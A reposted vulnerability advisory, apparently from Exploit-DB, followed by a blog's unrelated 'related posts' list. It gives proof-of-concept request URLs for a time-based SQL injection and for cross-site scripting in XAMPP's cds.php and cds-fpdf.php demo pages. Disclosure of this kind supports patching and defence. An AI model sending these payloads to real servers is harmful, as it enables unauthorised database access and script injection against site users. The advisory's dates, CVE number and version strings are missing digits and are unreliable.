[EXP]XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting
<!--
# Exploit Title: SQL injection in XAMPP 5.6. (and previous)
# Date: --
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.
# Tested on: All
# CVE : CVE--
# Category: webapps . Description XAMPP through 5.6. allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8. (and previous). . Proof of Concept http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29 . Solution: The product is discontinued. Update to last version. Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/ --> <!--
# Exploit Title: Cross Site Scripting in XAMPP 5.6. (and previous)
# Date: --
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.
# Tested on: All
# CVE : CVE--
# Category: webapps . Description XAMPP through 5.6. allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8. (and previous). . Proof of Concept First Request (not filter the characters's content): http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984 or Request: http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984 Second Request (to xss attack): http://X.X.X.X/xampp/cds-fpdf.php http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984 http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984 When cds-fpdf.php is loaded not filter the characters: <b><script>alert("XSS")</script></b></td><td class=tabval> cds.php filter it: <td class=tabval><b><script>alert("XSS"</script></b></td><td class=tabval> . Solution: The product is discontinued. Update to last version. Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/ -->
[EXP]XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting的更多相关文章
- 数字雨Shopex 4.8.5 SQL Injection Exp
# -*- coding:utf-8 -* #Author:MXi4oyu #Email:798033502@qq.com #Shopex 4.8.5 SQL Injection Exp #转载请说明 ...
- Cacti /graphs_new.php SQL Injection Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...
- druid sql黑名单 报异常 sql injection violation, part alway true condition not allow
最近使用druid,发现阿里这个连接池 真的很好用,可以监控到连接池活跃连接数 开辟到多少个连接数 关闭了多少个,对于我在项目中查看错误 问题,很有帮助, 但是最近发现里面 有条sql语句 被拦截了, ...
- PHP+MYSQL网站SQL Injection攻防
程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程:他们会先尝试着让程序报 ...
- SQL Injection(SQL注入漏洞)
审计前准备: 1.安�php程序(推荐phpStudy) 2.高亮编辑器(推荐 Sublimetext Notepad++) 3.新建一个文本,复制以下变量,这些变量是审计中需要在源码中寻找的 ### ...
- HP+MYSQL网站SQL Injection攻防
WebjxCom提示:程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程: ...
- ecshop /search.php SQL Injection Vul
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...
- How to prevent SQL injection attacks?
In our earlier tutorial on SQL Injection, one way to have prevented the SQL injection attack was by ...
随机推荐
- 大数据入门到精通8-spark RDD 复合key 和复合value 的map reduce操作
一.做基础数据准备 这次使用fights得数据. scala> val flights= sc.textFile("/user/hdfs/data/Flights/flights.cs ...
- nginx_server_location对客户资源的辨别规则
语法:location [ = | ~ | ~* | ^~ ] uri { …一组命令… } http://nginx.org/en/docs/http/ngx_http_core_module.ht ...
- SVD及其在推荐系统中的作用
本文先从几何意义上对奇异值分解SVD进行简单介绍,然后分析了特征值分解与奇异值分解的区别与联系,最后用python实现将SVD应用于推荐系统. 1.SVD详解 SVD(singular value d ...
- short s1 = 1; s1 = s1 + 1;和 short s1 = 1; s1 += 1;的问题,终于弄懂了
对于short s1 = 1; s1 = s1 + 1; 由于s1+1运算时会自动提升表达式的类型,所以结果是int型,再赋值给short类型s1时,编译器将报告需要强制转换类型的错误. 对于shor ...
- 654. Maximum Binary Tree 最大节点劈开,然后左边、右边排序
[抄题]: Given an integer array with no duplicates. A maximum tree building on this array is defined as ...
- 762. Prime Number of Set Bits in Binary Representation二进制中有质数个1的数量
[抄题]: Given two integers L and R, find the count of numbers in the range [L, R] (inclusive) having a ...
- Linux-目录结构及文件系统
1.Linux 系统的顶层目录结构 / 根目录 ├── bin 存放用户二进制文件 ├── boot 存放内核引导配置文件 ├── dev 存放设备文件 ...
- PHP开发——函数
函数的定义 l 函数是一段命名的代码段. 函数可以减轻工作量,减少重复的代码,方便后期维护. 函数的参数 l 实参:调用函数时,传递的参数就是实参,含有真正数据的. l 形参:定义函数时的参数. ...
- js 库
plupload.full.min.js 前端上传利器 jQuery WeUI - V1.0.1 微信公众号开发利器
- xsd
2018-10-08 <xsd:annotation> <xsd:documentation> <![CDATA[ 说明文档 ]]> </xsd:docume ...